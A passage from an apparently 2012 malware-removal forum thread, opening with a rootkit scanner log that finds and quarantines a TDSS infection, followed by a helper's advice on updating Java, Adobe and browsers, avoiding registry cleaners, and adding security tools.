13:29:59.0308 4240	WerSvc - ok
13:29:59.0476 4240	WinDefend (4575aa12561c5648483403541d0d7f2b) C:\Program Files\Windows Defender\mpsvc.dll
13:29:59.0500 4240	WinDefend - ok
13:29:59.0508 4240	WinHttpAutoProxySvc - ok
13:29:59.0619 4240	Winmgmt (6b2a1d0e80110e3d04e6863c6e62fd8a) C:\Windows\system32\wbem\WMIsvc.dll
13:29:59.0675 4240	Winmgmt - ok
13:29:59.0770 4240	WinRM (7cfe68bdc065e55aa5e8421607037511) C:\Windows\system32\WsmSvc.dll
13:29:59.0941 4240	WinRM - ok
13:30:00.0123 4240	Wlansvc (c008405e4feeb069e30da1d823910234) C:\Windows\System32\wlansvc.dll
13:30:00.0203 4240	Wlansvc - ok
13:30:00.0470 4240	wlidsvc (0a70f4022ec2e14c159efc4f69aa2477) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
13:30:00.0585 4240	wlidsvc - ok
13:30:00.0837 4240	WmiAcpi (701a9f884a294327e9141d73746ee279) C:\Windows\system32\drivers\wmiacpi.sys
13:30:00.0981 4240	WmiAcpi - ok
13:30:01.0153 4240	wmiApSrv (43be3875207dcb62a85c8c49970b66cc) C:\Windows\system32\wbem\WmiApSrv.exe
13:30:01.0187 4240	wmiApSrv - ok
13:30:01.0408 4240	WMPNetworkSvc (3978704576a121a9204f8cc49a301a9b) C:\Program Files\Windows Media Player\wmpnetwk.exe
13:30:01.0625 4240	WMPNetworkSvc - ok
13:30:01.0709 4240	WPCSvc (cfc5a04558f5070cee3e3a7809f3ff52) C:\Windows\System32\wpcsvc.dll
13:30:01.0789 4240	WPCSvc - ok
13:30:01.0836 4240	WPDBusEnum (801fbdb89d472b3c467eb112a0fc9246) C:\Windows\system32\wpdbusenum.dll
13:30:01.0889 4240	WPDBusEnum - ok
13:30:01.0993 4240	WpdUsb (de9d36f91a4df3d911626643debf11ea) C:\Windows\system32\DRIVERS\wpdusb.sys
13:30:02.0027 4240	WpdUsb - ok
13:30:02.0317 4240	WPFFontCache_v0400 (dcf3e3edf5109ee8bc02fe6e1f045795) C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
13:30:02.0350 4240	WPFFontCache_v0400 - ok
13:30:02.0405 4240	ws2ifsl (e3a3cb253c0ec2494d4a61f5e43a389c) C:\Windows\system32\drivers\ws2ifsl.sys
13:30:02.0439 4240	ws2ifsl - ok
13:30:02.0503 4240	wscsvc (1ca6c40261ddc0425987980d0cd2aaab) C:\Windows\system32\wscsvc.dll
13:30:02.0545 4240	wscsvc - ok
13:30:02.0593 4240	WSDPrintDevice (4422ac5ed8d4c2f0db63e71d4c069dd7) C:\Windows\system32\DRIVERS\WSDPrint.sys
13:30:02.0618 4240	WSDPrintDevice - ok
13:30:02.0624 4240	WSearch - ok
13:30:02.0844 4240	wuauserv (6298277b73c77fa99106b271a7525163) C:\Windows\system32\wuaueng.dll
13:30:03.0087 4240	wuauserv - ok
13:30:03.0270 4240	WUDFRd (ac13cb789d93412106b0fb6c7eb2bcb6) C:\Windows\system32\DRIVERS\WUDFRd.sys
13:30:03.0303 4240	WUDFRd - ok
13:30:03.0364 4240	wudfsvc (575a4190d989f64732119e4114045a4f) C:\Windows\System32\WUDFSvc.dll
13:30:03.0421 4240	wudfsvc - ok
13:30:03.0524 4240	xnacc (9eea6d029fef5f3016d089b1a603837d) C:\Windows\system32\DRIVERS\xnacc.sys
13:30:03.0566 4240	xnacc - ok
13:30:03.0595 4240	MBR (0x1B8) (5b5e648d12fcadc244c1ec30318e1eb9) \Device\Harddisk0\DR0
13:30:04.0218 4240	\Device\Harddisk0\DR0 ( TDSS File System ) - warning
13:30:04.0218 4240	\Device\Harddisk0\DR0 - detected TDSS File System (1)
13:30:04.0224 4240	Boot (0x1200) (4c665477e7a79fdb1f3f319443854ef8) \Device\Harddisk0\DR0\Partition0
13:30:04.0226 4240	\Device\Harddisk0\DR0\Partition0 - ok
13:30:04.0227 4240	============================================================
13:30:04.0227 4240	Scan finished
13:30:04.0227 4240	============================================================
13:30:04.0242 3296	Detected object count: 14
13:30:04.0242 3296	Actual detected object count: 14
13:31:25.0577 3296	BVRPMPR5 ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0577 3296	BVRPMPR5 ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0580 3296	IDriverT ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0580 3296	IDriverT ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0584 3296	KR10I ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0584 3296	KR10I ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0587 3296	KR10N ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0588 3296	KR10N ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0590 3296	KR3NPXP ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0590 3296	KR3NPXP ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0593 3296	NCHSSVAD ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0593 3296	NCHSSVAD ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0596 3296	ServiceLayer ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0596 3296	ServiceLayer ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0599 3296	sptd ( LockedFile.Multi.Generic ) - skipped by user
13:31:25.0599 3296	sptd ( LockedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0600 3296	StarWindServiceAE ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0600 3296	StarWindServiceAE ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0604 3296	TNaviSrv ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0604 3296	TNaviSrv ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0607 3296	TODDSrv ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0607 3296	TODDSrv ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0610 3296	UleadBurningHelper ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0610 3296	UleadBurningHelper ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0613 3296	USBAAPL ( UnsignedFile.Multi.Generic ) - skipped by user
13:31:25.0613 3296	USBAAPL ( UnsignedFile.Multi.Generic ) - User select action: Skip 
13:31:25.0717 3296	\Device\Harddisk0\DR0\TDLFS\config.ini - copied to quarantine
13:31:25.0822 3296	\Device\Harddisk0\DR0\TDLFS\tdl - copied to quarantine
13:31:25.0830 3296	\Device\Harddisk0\DR0\TDLFS\rsrc.dat - copied to quarantine
13:31:25.0852 3296	\Device\Harddisk0\DR0\TDLFS\tdlcmd.dll - copied to quarantine
13:31:27.0200 3296	\Device\Harddisk0\DR0\TDLFS\data.db - copied to quarantine
13:31:27.0205 3296	\Device\Harddisk0\DR0\TDLFS\data.js - copied to quarantine
13:31:27.0215 3296	\Device\Harddisk0\DR0\TDLFS - deleted
13:31:27.0215 3296	\Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Delete


----------



## gagraptor (May 23, 2012)

I had no problems uninstalling all the programs. I deleted some manually


----------



## Mark1956 (May 7, 2011)

Just a couple more things to do and we are finished.

*Adobe*
Close any programs you may have running - especially your web browser.
Click on Start







> *Control Panel*, double-click on Programs and Features and remove *all* older versions of Adobe. 
Then go to this link here and select the latest version to download and install. You will normally only need the downloads from either of the four "Readers and Players" in the top right hand corner of the page. Older versions of Adobe are vulnerable to infection so should always be uninstalled before installing the most up to date version available.

*Java*

*Important Note*: Your version of *Java is out of date.* *Older versions have vulnerabilities that malicious sites can use to exploit and infect your system*.

Microsoft: Unprecedented Wave of Java Exploitation
Drive-by Trojan preying on out-of-date Java installations 
Ghosts of Java Haunt Users
Please follow these steps to remove older version Java components and update:

Download the latest version of *Java Runtime Environment (JRE) Version 7* and save it to your desktop.
Look for "*Java Platform, Standard Edition*".
Click the "*Download JRE*" button to the right.








Read the License Agreement, and then check the box that says: "_Accept License Agreement_".
From the list, select your OS and Platform (32-bit or 64-bit).
If a download for an *Offline Installation* is available, it is recommended to choose that and save the file to your desktop.
Close any programs you may have running - especially your web browser.
Click on Start







> Control Panel, double-click on Programs and Features and remove *all* older versions of Java.

Check (_highlight_) any item with Java Runtime Environment (JRE or J2SE) in the name.
Click the *Uninstall* button at the top of the window and follow the onscreen instructions for the Java uninstaller.
Repeat as many times as necessary to remove each Java versions.
Reboot your computer once all Java components are removed.
Then from your desktop double-click on *jre-7u4-windows-i586.exe* (or jre-7u4-windows-x64.exe for 64-bit) to install the newest version.
If the uninstaller refuses to launch due to insufficient user permissions, then Run As Administrator.
When the _Java Setup - Welcome_ window opens, click the *Install* button.
If offered to install a Toolbar, just *uncheck* the box before continuing unless you want it.
The McAfee Security Scan Plus tool is _installed by default_ unless you *uncheck* the McAfee installation box when updating Java.
_-- Java is updated frequently. If you want to be automatically notified of future updates, just turn on the Java Automatic Update feature and you will not have to remember to update when Java releases a new version._
*Note:* The *Java Quick Starter (JQS.exe)* adds a service to improve the initial startup time of Java applets and applications but it's not necessary.

To *disable the JQS service* if you don't want to use it:

Go to Start > Control Panel > Java > Advanced > Miscellaneous and *uncheck* the box for *Java Quick Starter*.
Click Ok and reboot your computer.
_____________________________________________________________________________
*Internet Explorer*
Your Internet Explorer is out of date, the latest version for Windows7/Vista has a better level of security which helps to stop malicious software from reaching your PC. Please follow the instructions to install IE9 from here: Install/Uninstall Internet Explorer 9
_____________________________________________________________________________
*Firefox*
Your version os Firefox is out of date. Please go here for instructions to update to the latest version:
How to Update Firefox
_____________________________________________________________________________
*IMPORTANT NOTE*: Your log shows you are using a registry cleaner/optimizer. CCleaner. Although CCleaner is a usefull tool, please read this in respect of its *Registry Cleaning* function. 
We *do not* recommend the routine use of registry cleaners/optimizers for several reasons:
• *Registry cleaners are extremely powerful applications that can damage the registry by using aggressive cleaning routines and cause your computer to become unbootable.*

The Windows registry is a central repository (database) for storing configuration data, user settings and machine-dependent settings, and options for the operating system. It contains information and settings for all hardware, software, users, and preferences. Whenever a user makes changes to settings, file associations, system policies, or installed software, the changes are reflected and stored in this repository. The *registry is a crucial component *because it is where Windows _"remembers"_ all this information, how it works together, how Windows boots the system and what files it uses when it does. The registry is also a vulnerable subsystem, in that relatively *small changes done incorrectly can render the system inoperable*. For a more detailed explanation, read Understanding The Registry

• *Not all registry cleaners are created equal*. There are a number of them available but they do not all work entirely the same way. Each vendor uses different criteria as to what constitutes a "bad entry". One cleaner may find entries on your system that will not cause problems when removed, another may not find the same entries, and still another may want to remove entries required for a program to work. Further, some vendors who offer registry cleaners use deceptive advertisements and claims which are borderline *scams*. They may alert you to finding thousands of registry errors which can only be fixed and improve performance if you use their product.

• *Not all registry cleaners create a backup of the registry before making changes.* If the changes prevent the system from booting up, then there is no backup available to restore it in order to regain functionality. A backup of the registry is essential *BEFORE* making any changes to the registry.

•* Improperly removing registry entries can hamper malware disinfection* and make the removal process more difficult if your computer becomes infected. For example, removing malware related registry entries before the infection is properly identified can contribute to system instability and even make the malware undetectable to removal tools.

• *The usefulness of cleaning the registry is highly overrated and can be dangerous.* In most cases, using a cleaner to remove obsolete, invalid, and erroneous entries does not affect system performance but it can result in "unpredictable results". 
Unless you have a particular problem that requires a specific registry edit to correct it, I would suggest you leave the registry alone. Using registry cleaning tools *unnecessarily* or* incorrectly* could lead to *disastrous effects on your operating system such as preventing it from ever starting again.* *For routine use, the benefits to your computer are negligible while the potential risks are great.*
If you are still not convinced then please read the information in these following links.

• Ed Bott's Weblog: Why I don't use registry cleaners
• Do I need a Registry Cleaner?
• Registry Cleaners and System Tweaking Tools
_____________________________________________________________________________
*Some additional security measures.*
If your present security software does not include a third party Firewall or AntiSpyware.
Go Here for a selection of third party Firewalls.
Go Here or Here for Anti Spyware.

*Always keep your Java, Adobe and Flash Player up to date.*
Why you should update Java
Why you should update Adobe
Why you should update Flash Player

Malwarebytes free version (which you may have used during this thread) is worth having for regular scans of your system, always check for updates before using it. If you can afford the Malwarebytes Pro version it will provide even better protection with a full time active scanner. Never have more than one active anti virus, anti spyware or firewall running on your system as it can cause conflicts and slow down the PC. You can safely run the Pro version of *Malwarebytes* with any Anti Virus software.

WOT (Web OF Trust) Will warn you (in most cases) about dangerous web sites.

Secunia PSI is a FREE security tool designed to detect vulnerable and out-dated programs and plug-ins which expose your PC to attacks. Attacks exploiting vulnerable programs and plug-ins are rarely blocked by traditional anti-virus and are therefore increasingly "popular"among criminals.

WinPatrol is a useful facility to have. *WinPatrol* takes snapshots of your critical system resources and alerts you to any changes that may occur without your knowledge. It can also be used to control all your *start up* programs.


----------



## Mark1956 (May 7, 2011)

As long as you have no further issues, please mark the thread as Solved by clicking on the *"Mark Solved"* button.


----------

